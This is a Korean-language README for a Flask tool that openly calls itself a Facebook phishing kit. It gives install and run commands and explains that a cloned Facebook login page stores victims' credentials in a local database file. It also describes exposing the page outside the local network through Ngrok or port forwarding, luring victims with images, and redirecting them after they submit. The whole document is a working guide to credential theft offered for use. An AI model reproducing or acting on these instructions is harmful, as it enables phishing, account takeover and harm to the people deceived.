
플라스크 기반의 파이썬 서버 도구로, 이 도구는 일부 페이스북 자격 증명을 피싱할 수 있습니다!
원저자 : Arslan Mughal
BY: arjunindia
원본 저장소 : https://github.com/arslanmughal5566/facebook_phishing
이 스크립트를 사용하면 소셜 엔지니어링 기술을 활용하여 Facebook 로그인 자격 증명을 탈취할 수 있습니다.
1 : Python3.x 2 : Flask Flask를 설치하려면 터미널을 열고 다음 명령을 입력하십시오.
user@repo~# pip3 install flask
Flask를 설치하기 전에 python 3가 설치되어 있는지 확인하십시오. Windows 또는 macOS를 사용하는 경우 먼저 python3를 다운로드하여 설치하십시오.
저장소를 클론하고 소스 폴더에서 터미널을 연 다음 app.py를 실행하십시오.
user@repo~# python3 app.py
이제 브라우저를 열고 0.0.0.0 또는 localhost 또는 LAN IP로 이동하십시오.
Facebook 로그인 페이지가 나타납니다. 자격 증명을 입력하고 로그인을 누르면 아무 일도 일어나지 않는 것처럼 보일 것입니다. 하지만 저를 믿으세요 :)
소스 폴더로 이동한 다음 database 폴더로 가면 db_1이라는 파일이 하나 있습니다.
../database/db_1
그 파일을 열면 로그인 페이지에서 입력한 자격 증명이 db_1 파일에 저장됩니다.
이것이 동일한 네트워크에서 공격하는 방법입니다. 하지만 Ngrok을 사용하여 네트워크 외부에서도 이 공격을 수행할 수 있습니다.
포트 포워딩을 확실히 사용할 수 있습니다. 포트 80(HTTP 서버 포트)을 포워딩하면 WAN을 통해 페이지를 사용할 수 있습니다.
또한 링크에 이미지나 다른 것을 첨부하여 사용자가 즉시 자격 증명을 입력하도록 유도할 수 있습니다.
다음 명령을 실행하십시오:- git stash && git pull
1) 페이지를 모바일 친화적으로 만들었습니다.
2) 제출 후 리디렉션될 다른 페이지 b.html을 만들었습니다. templates 폴더 내의 b.html 파일에서 url 변수를 피해자가 리디렉션될 웹페이지로 변경하십시오.
=>ADDED ./install.sh. 이제 스크립트로 설치하면 'facebooker' 명령을 사용하여 도구를 실행할 수 있습니다.
다음 명령으로 스크립트를 설치할 수 있습니다:-
user@repo:~# cd fb-phisher-python
user@repo:fb-phisher-python# chmod +x install.sh
user@repo:fb-phisher-python# ./install.sh
이제 'facebooker'를 입력하여 실행할 수 있습니다.
user@repo:~# facebooker
=>ADDED EXTRA FUNCTIN, 즉 리디렉션할 링크를 쉽게 수정할 수 있는 새로운 함수입니다. install.sh로 설치하고 facebooker 명령어로 실행하면 실행 시 새 링크를 묻습니다.